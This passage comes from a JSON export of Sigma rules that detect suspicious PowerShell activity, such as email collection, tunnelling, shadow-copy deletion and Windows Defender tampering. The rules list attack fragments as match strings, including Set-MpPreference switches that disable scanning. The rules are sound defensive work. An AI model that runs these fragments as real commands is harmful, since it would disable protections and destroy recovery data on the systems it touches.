tasks\nlevel: low\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_mail_acces.yml",
    "content": "title: Powershell Local Email Collection\nid: 2837e152-93c8-43d2-85ba-c3cd3c2ae614\nstatus: test\ndescription: |\n    Adversaries may target user email on local systems to collect sensitive information.\n    Files containing email data can be acquired from a user's local system, such as Outlook storage or cache files.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1114.001/T1114.001.md\nauthor: frack113\ndate: 2021-07-21\nmodified: 2022-12-25\ntags:\n    - attack.collection\n    - attack.t1114.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - 'Get-Inbox.ps1'\n            - 'Microsoft.Office.Interop.Outlook'\n            - 'Microsoft.Office.Interop.Outlook.olDefaultFolders'\n            - '-comobject outlook.application'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_mount_diskimage.yml",
    "content": "title: Suspicious Mount-DiskImage\nid: 29e1c216-6408-489d-8a06-ee9d151ef819\nstatus: test\ndescription: Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-1---mount-iso-image\n    - https://learn.microsoft.com/en-us/powershell/module/storage/mount-diskimage?view=windowsserver2022-ps\nauthor: frack113\ndate: 2022-02-01\ntags:\n    - attack.defense-evasion\n    - attack.t1553.005\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'Mount-DiskImage '\n            - '-ImagePath '\n    condition: selection\nfalsepositives:\n    - Legitimate PowerShell scripts\nlevel: low\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_mounted_share_deletion.yml",
    "content": "title: PowerShell Deleted Mounted Share\nid: 66a4d409-451b-4151-94f4-a55d559c49b0\nstatus: test\ndescription: Detects when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md\nauthor: 'oscd.community, @redcanary, Zach Stanford @svch0st'\ndate: 2020-10-08\nmodified: 2025-10-07\ntags:\n    - attack.defense-evasion\n    - attack.t1070.005\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - 'Remove-SmbShare'\n            - 'Remove-FileShare'\n    filter_main_module_load:\n        ScriptBlockText|contains|all:\n            - 'FileShare.cdxml'\n            - 'Microsoft.PowerShell.Core\\Export-ModuleMember'\n            - 'ROOT/Microsoft/Windows/Storage/MSFT_FileShare'\n            - 'ObjectModelWrapper'\n            - 'Cmdletization.MethodParameter'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Administrators or Power users may remove their shares via cmd line\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_networkcredential.yml",
    "content": "title: Suspicious Connection to Remote Account\nid: 1883444f-084b-419b-ac62-e0d0c5b3693f\nstatus: test\ndescription: |\n    Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts.\n    Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1110.001/T1110.001.md#atomic-test-2---brute-force-credentials-of-single-active-directory-domain-user-via-ldap-against-domain-controller-ntlm-or-kerberos\nauthor: frack113\ndate: 2021-12-27\ntags:\n    - attack.credential-access\n    - attack.t1110.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - 'System.DirectoryServices.Protocols.LdapDirectoryIdentifier'\n            - 'System.Net.NetworkCredential'\n            - 'System.DirectoryServices.Protocols.LdapConnection'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_new_psdrive.yml",
    "content": "title: Suspicious New-PSDrive to Admin Share\nid: 1c563233-030e-4a07-af8c-ee0490a66d3a\nstatus: test\ndescription: Detects use of New-PSDrive to map a remote administrative share (a share name ending in a dollar sign) over Server Message Block (SMB). The adversary may then perform actions as the logged-on user.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.002/T1021.002.md#atomic-test-2---map-admin-share-powershell\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/new-psdrive?view=powershell-7.2\nauthor: frack113\ndate: 2022-08-13\ntags:\n    - attack.lateral-movement\n    - attack.t1021.002\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'New-PSDrive'\n            - '-psprovider '\n            - 'filesystem'\n            - '-root '\n            - '\\\\\\\\'\n            - '$'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_proxy_scripts.yml",
    "content": "title: Suspicious TCP Tunnel Via PowerShell Script\nid: bd33d2aa-497e-4651-9893-5c5364646595\nstatus: test\ndescription: Detects PowerShell scripts that create TCP sockets/listeners alongside outbound HTTP requests, which could be indicative of tunneling activity\nreferences:\n    - https://github.com/Arno0x/PowerShellScripts/blob/a6b7d5490fbf0b20f91195838f3a11156724b4f7/proxyTunnel.ps1\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-08\ntags:\n    - attack.command-and-control\n    - attack.t1090\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - '[System.Net.HttpWebRequest]'\n            - 'System.Net.Sockets.TcpListener'\n            - 'AcceptTcpClient'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_recon_export.yml",
    "content": "title: Recon Information for Export with PowerShell\nid: a9723fcc-881c-424c-8709-fd61442ab3c3\nstatus: test\ndescription: Once established within a system or network, an adversary may use automated techniques for collecting internal data\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md\nauthor: frack113\ndate: 2021-07-30\nmodified: 2022-12-25\ntags:\n    - attack.collection\n    - attack.t1119\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_action:\n        ScriptBlockText|contains:\n            - 'Get-Service '\n            - 'Get-ChildItem '\n            - 'Get-Process '\n    selection_redirect:\n        ScriptBlockText|contains: '> $env:TEMP\\'\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_remove_adgroupmember.yml",
    "content": "title: Remove Account From Domain Admin Group\nid: 48a45d45-8112-416b-8a67-46e03a4b2107\nstatus: test\ndescription: |\n    Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users.\n    Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1531/T1531.md#atomic-test-3---remove-account-from-domain-admin-group\nauthor: frack113\ndate: 2021-12-26\ntags:\n    - attack.impact\n    - attack.t1531\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'Remove-ADGroupMember'\n            - '-Identity '\n            - '-Members '\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_service_dacl_modification_set_service.yml",
    "content": "title: Suspicious Service DACL Modification Via Set-Service Cmdlet - PS\nid: 22d80745-6f2c-46da-826b-77adaededd74\nrelated:\n    - id: a95b9b42-1308-4735-a1af-abb1c5e6f5ac\n      type: similar\nstatus: test\ndescription: Detects usage of the \"Set-Service\" PowerShell cmdlet with the SecurityDescriptorSddl parameter to apply a security descriptor containing deny ACEs, which hides a service from other utilities such as \"sc.exe\" or \"Get-Service\". The parameter is only available in PowerShell 7.\nreferences:\n    - https://twitter.com/Alh4zr3d/status/1580925761996828672\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-24\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1574.011\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_sddl_flag:\n        ScriptBlockText|contains:\n            - '-SecurityDescriptorSddl '\n            - '-sd '\n    selection_set_service:\n        ScriptBlockText|contains|all:\n            - 'Set-Service '\n            - 'D;;'\n        ScriptBlockText|contains:\n            - ';;;IU'\n            - ';;;SU'\n            - ';;;BA'\n            - ';;;SY'\n            - ';;;WD'\n    condition: all of selection_*\nfalsepositives:\n    - Rare intended use of hidden services\n    - Rare FP could occur due to the non-linearity of the ScriptBlockText log\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_set_alias.yml",
    "content": "title: Potential PowerShell Obfuscation Using Alias Cmdlets\nid: 96cd126d-f970-49c4-848a-da3a09f55c55\nrelated:\n    - id: e8314f79-564d-4f79-bc13-fbc0bf2660d8\n      type: derived\nstatus: test\ndescription: Detects Set-Alias or New-Alias cmdlet usage, which can be used as a means to obfuscate PowerShell scripts\nreferences:\n    - https://github.com/1337Rin/Swag-PSO\nauthor: frack113\ndate: 2023-01-08\nmodified: 2025-10-22\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1027\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - 'Set-Alias '\n            - 'New-Alias '\n    filter_main_cim:\n        ScriptBlockText:\n            - 'Set-Alias -Name ncms -Value New-CimSession -Option ReadOnly, AllScope -ErrorAction SilentlyContinue'\n            - 'Set-Alias -Name gcls -Value Get-CimClass -Option ReadOnly, AllScope -ErrorAction SilentlyContinue'\n            - 'Set-Alias -Name ncso -Value New-CimSessionOption -Option ReadOnly, AllScope -ErrorAction SilentlyContinue'\n            - 'Set-Alias -Name gcms -Value Get-CimSession -Option ReadOnly, AllScope -ErrorAction SilentlyContinue'\n            - 'Set-Alias -Name rcms -Value Remove-cimSession -Option ReadOnly, AllScope -ErrorAction SilentlyContinue'\n            - 'Set-Alias -Name rcie -Value Register-CimIndicationEvent -Option ReadOnly, AllScope -ErrorAction SilentlyContinue'\n            - 'Set-Alias -Name gcai -Value Get-CimAssociatedInstance -Option ReadOnly, AllScope -ErrorAction SilentlyContinue'\n            - 'Set-Alias -Name gcim -Value Get-CimInstance -Option ReadOnly, AllScope -ErrorAction SilentlyContinue'\n            - 'Set-Alias -Name scim -Value Set-CimInstance -Option ReadOnly, AllScope -ErrorAction SilentlyContinue'\n            - 'Set-Alias -Name ncim -Value New-CimInstance -Option ReadOnly, AllScope -ErrorAction SilentlyContinue'\n            - 'Set-Alias -Name rcim -Value Remove-cimInstance -Option ReadOnly, AllScope -ErrorAction SilentlyContinue'\n            - 'Set-Alias -Name icim -Value Invoke-CimMethod -Option ReadOnly, AllScope -ErrorAction SilentlyContinue'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_smb_share_reco.yml",
    "content": "title: Suspicious Get Information for SMB Share\nid: 95f0643a-ed40-467c-806b-aac9542ec5ab\nstatus: test\ndescription: |\n    Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as\n    a precursor for Collection and to identify potential systems of interest for Lateral Movement.\n    Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md\nauthor: frack113\ndate: 2021-12-15\nmodified: 2022-12-25\ntags:\n    - attack.discovery\n    - attack.t1069.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains: get-smbshare\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_ssl_keyword.yml",
    "content": "title: Suspicious SSL Connection\nid: 195626f3-5f1b-4403-93b7-e6cfd4d6a078\nstatus: test\ndescription: Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1573/T1573.md#atomic-test-1---openssl-c2\n    - https://medium.com/walmartglobaltech/openssl-server-reverse-shell-from-windows-client-aee2dbfa0926\nauthor: frack113\ndate: 2022-01-23\ntags:\n    - attack.command-and-control\n    - attack.t1573\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - System.Net.Security.SslStream\n            - Net.Security.RemoteCertificateValidationCallback\n            - '.AuthenticateAsClient'\n    condition: selection\nfalsepositives:\n    - Legitimate administrative script\nlevel: low\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_start_process.yml",
    "content": "title: Suspicious Start-Process PassThru\nid: 0718cd72-f316-4aa2-988f-838ea8533277\nstatus: test\ndescription: Detects use of the Start-Process cmdlet with the PassThru and FilePath parameters, which launches a program and returns its process object to the calling script\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036.003/T1036.003.md\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/Start-Process?view=powershell-5.1&viewFallbackFrom=powershell-7\nauthor: frack113\ndate: 2022-01-15\ntags:\n    - attack.defense-evasion\n    - attack.t1036.003\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - Start-Process\n            - '-PassThru '\n            - '-FilePath '\n    condition: selection\nfalsepositives:\n    - Legitimate PowerShell scripts\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_unblock_file.yml",
    "content": "title: Suspicious Unblock-File\nid: 5947497f-1aa4-41dd-9693-c9848d58727d\nstatus: test\ndescription: Detects use of the Unblock-File cmdlet, which removes the Zone.Identifier alternate data stream that marks a file as downloaded from the internet (Mark-of-the-Web).\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-3---remove-the-zoneidentifier-alternate-data-stream\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/unblock-file?view=powershell-7.2\nauthor: frack113\ndate: 2022-02-01\ntags:\n    - attack.defense-evasion\n    - attack.t1553.005\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'Unblock-File '\n            - '-Path '\n    condition: selection\nfalsepositives:\n    - Legitimate PowerShell scripts\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_wallpaper.yml",
    "content": "title: Replace Desktop Wallpaper by Powershell\nid: c5ac6a1e-9407-45f5-a0ce-ca9a0806a287\nstatus: test\ndescription: |\n    An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users.\n    This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1491.001/T1491.001.md\nauthor: frack113\ndate: 2021-12-26\ntags:\n    - attack.impact\n    - attack.t1491.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_1:\n        ScriptBlockText|contains|all:\n            - 'Get-ItemProperty'\n            - 'Registry::'\n            - 'HKEY_CURRENT_USER\\Control Panel\\Desktop\\'\n            - 'WallPaper'\n    selection_2:\n        ScriptBlockText|contains: SystemParametersInfo(20,0,*,3)\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_win32_pnpentity.yml",
    "content": "title: Powershell Suspicious Win32_PnPEntity\nid: b26647de-4feb-4283-af6b-6117661283c5\nstatus: test\ndescription: Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1120/T1120.md\nauthor: frack113\ndate: 2021-08-23\nmodified: 2022-12-25\ntags:\n    - attack.discovery\n    - attack.t1120\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains: Win32_PnPEntity\n    condition: selection\nfalsepositives:\n    - Admin script\nlevel: low\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_win32_shadowcopy_deletion.yml",
    "content": "title: Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script\nid: c1337eb8-921a-4b59-855b-4ba188ddcc42\nrelated:\n    - id: e17121b4-ef2a-4418-8a59-12fb1631fa9e\n      type: derived\n    - id: 21ff4ca9-f13a-41ad-b828-0077b2af2e40\n      type: similar\nstatus: test\ndescription: Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell\n    - https://www.elastic.co/guide/en/security/current/volume-shadow-copy-deletion-via-powershell.html\nauthor: Tim Rauch, frack113\ndate: 2022-09-20\nmodified: 2022-12-02\ntags:\n    - attack.impact\n    - attack.t1490\nlogsource:\n    category: ps_script\n    product: windows\ndetection:\n    selection_get:\n        ScriptBlockText|contains:\n            - 'Get-WmiObject'\n            - 'gwmi'\n            - 'Get-CimInstance'\n            - 'gcim'\n    selection_shadowcopy:\n        ScriptBlockText|contains: 'Win32_ShadowCopy'\n    selection_delete:\n        ScriptBlockText|contains:\n            - '.Delete()'\n            - 'Remove-WmiObject'\n            - 'rwmi'\n            - 'Remove-CimInstance'\n            - 'rcim'\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_windowstyle.yml",
    "content": "title: Suspicious PowerShell WindowStyle Option\nid: 313fbb0a-a341-4682-848d-6d6f8c4fab7c\nstatus: test\ndescription: |\n    Adversaries may use hidden windows to conceal malicious activity from the plain sight of users.\n    In some cases, windows that would typically be displayed when an application carries out an operation can be hidden\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.003/T1564.003.md\nauthor: frack113, Tim Shelton (fp AWS)\ndate: 2021-10-20\nmodified: 2023-01-03\ntags:\n    - attack.defense-evasion\n    - attack.t1564.003\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'powershell'\n            - 'WindowStyle'\n            - 'Hidden'\n    filter:\n        ScriptBlockText|contains|all:\n            - ':\\Program Files\\Amazon\\WorkSpacesConfig\\Scripts\\'\n            - '$PSScriptRoot\\Module\\WorkspaceScriptModule\\WorkspaceScriptModule'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_write_eventlog.yml",
    "content": "title: PowerShell Write-EventLog Usage\nid: 35f41cd7-c98e-469f-8a02-ec4ba0cc7a7e\nstatus: test\ndescription: Detects usage of the \"Write-EventLog\" cmdlet with the 'RawData' parameter. The cmdlet can be leveraged to store malicious payloads as binary data in the event log and retrieve them later for use\nreferences:\n    - https://www.blackhillsinfosec.com/windows-event-logs-for-red-teams/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-16\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'Write-EventLog'\n            - '-RawData '\n    condition: selection\nfalsepositives:\n    - Legitimate applications writing events via this cmdlet. Investigate alerts to determine if the action is benign\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_zip_compress.yml",
    "content": "title: Zip A Folder With PowerShell For Staging In Temp - PowerShell Script\nid: b7a3c9a3-09ea-4934-8864-6a32cacd98d9 # PowerShell Script\nrelated:\n    - id: 71ff406e-b633-4989-96ec-bc49d825a412 # PowerShell Classic\n      type: similar\n    - id: daf7eb81-35fd-410d-9d7a-657837e602bb # PowerShell Module\n      type: similar\n    - id: 85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98 # Process Creation\n      type: similar\nstatus: test\ndescription: |\n    Detects PowerShell scripts that make use of the \"Compress-Archive\" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration.\n    An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md\n    - https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a\nauthor: Nasreddine Bencherchali (Nextron Systems), frack113\ndate: 2021-07-20\nmodified: 2023-12-18\ntags:\n    - attack.collection\n    - attack.t1074.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - 'Compress-Archive -Path*-DestinationPath $env:TEMP'\n            - 'Compress-Archive -Path*-DestinationPath*\\AppData\\Local\\Temp\\'\n            - 'Compress-Archive -Path*-DestinationPath*:\\Windows\\Temp\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_syncappvpublishingserver_exe.yml",
    "content": "title: SyncAppvPublishingServer Execution to Bypass Powershell Restriction\nid: dddfebae-c46f-439c-af7a-fdb6bde90218\nrelated:\n    - id: fde7929d-8beb-4a4c-b922-be9974671667\n      type: derived\n    - id: 9f7aa113-9da6-4a8d-907c-5f1a4b908299\n      type: derived\nstatus: test\ndescription: Detects SyncAppvPublishingServer process execution, which is usually utilized by adversaries to bypass PowerShell execution restrictions.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/\nauthor: 'Ensar Şamil, @sblmsrsn, OSCD Community'\ndate: 2020-10-05\nmodified: 2022-12-25\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains: 'SyncAppvPublishingServer.exe'\n    condition: selection\nfalsepositives:\n    - App-V clients\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_tamper_windows_defender_rem_mp.yml",
    "content": "title: Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging\nid: ae2bdd58-0681-48ac-be7f-58ab4e593458\nrelated:\n    - id: 07e3cb2c-0608-410d-be4b-1511cb1a0448\n      type: similar\nstatus: test\ndescription: Detects attempts to remove Windows Defender configuration using the 'MpPreference' cmdlet\nreferences:\n    - https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-05\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_remove:\n        ScriptBlockText|contains: 'Remove-MpPreference'\n    selection_tamper:\n        ScriptBlockText|contains:\n            - '-ControlledFolderAccessProtectedFolders '\n            - '-AttackSurfaceReductionRules_Ids '\n            - '-AttackSurfaceReductionRules_Actions '\n            - '-CheckForSignaturesBeforeRunningScan '\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate PowerShell scripts\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_tamper_windows_defender_set_mp.yml",
    "content": "title: Tamper Windows Defender - ScriptBlockLogging\nid: 14c71865-6cd3-44ae-adaa-1db923fae5f2\nrelated:\n    - id: ec19ebab-72dc-40e1-9728-4c0b805d722c\n      type: derived\nstatus: test\ndescription: Detects PowerShell scripts attempting to disable scheduled scanning and other parts of Windows Defender ATP or set default actions to allow.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md\n    - https://learn.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps\n    - https://bidouillesecurity.com/disable-windows-defender-in-powershell/\nauthor: frack113, elhoim, Tim Shelton (fps, alias support), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-01-16\nmodified: 2024-01-02\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_options_disabling_preference:\n        ScriptBlockText|contains: 'Set-MpPreference'\n    selection_options_disabling_function:\n        ScriptBlockText|contains:\n            - '-dbaf $true'\n            - '-dbaf 1'\n            - '-dbm $true'\n            - '-dbm 1'\n            - '-dips $true'\n            - '-dips 1'\n            - '-DisableArchiveScanning $true'\n            - '-DisableArchiveScanning 1'\n            - '-DisableBehaviorMonitoring $true'\n            - '-DisableBehaviorMonitoring 1'\n            - '-DisableBlockAtFirstSeen $true'\n            - '-DisableBlockAtFirstSeen 1'\n            - '-DisableCatchupFullScan $true'\n            - '-DisableCatchupFullScan 1'\n            - '-DisableCatchupQuickScan $true'\n            - '-DisableCatchupQuickScan 1'\n            - '-DisableIntrusionPreventionSystem $true'\n            - '-DisableIntrusionPreventionSystem 1'\n            - '-DisableIOAVProtection $true'\n            - '-DisableIOAVProtection 1'\n            - '-DisableRealtimeMonitoring $true'\n            - '-DisableRealtimeMonitoring 1'\n            - '-DisableRemovableDriveScanning $true'\n            - '-DisableRemovableDriveScanning 1'\n            - '-DisableScanningMappedNetworkDrivesForFullScan $true'\n            - '-DisableScanningMappedNetworkDrivesForFullScan 1'\n            - '-DisableScanningNetworkFiles $true'\n            - '-DisableScanningNetworkFiles 1'\n            - '-DisableScriptScanning $true'\n            - '-DisableScriptScanning 1'\n            - '-MAPSReporting $false'\n            - '-MAPSReporting 0'\n            - '-drdsc $true'\n            - '-drdsc 1'\n            - '-drtm $true'\n            - '-drtm 1'\n            - '-dscrptsc $true'\n            - '-dscrptsc 1'\n            - '-dsmndf $true'\n            - '-dsmndf 1'\n            - '-dsnf $true'\n            - '-dsnf 1'\n            - '-dss $true'\n            - '-dss 1'\n    selection_other_default_actions_allow:\n        ScriptBlockText|contains: 'Set-MpPreference'\n    selection_other_default_actions_func:\n        ScriptBlockText|contains:\n            - 'HighThreatDefaultAction Allow'\n            - 'htdefac Allow'\n            - 'LowThreatDefaultAction Allow'\n            - 'ltdefac Allow'\n            - 'ModerateThreatDefaultAction Allow'\n            - 'mtdefac Allow'\n            - 'SevereThreatDefaultAction Allow'\n            - 'stdefac Allow'\n    condition: all of selection_options_disabling_* or all of selection_other_default_actions_*\nfalsepositives:\n    - Legitimate PowerShell scripts that disable Windows Defender for troubleshooting purposes. Must be investigated.\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_test_netconnection.yml",
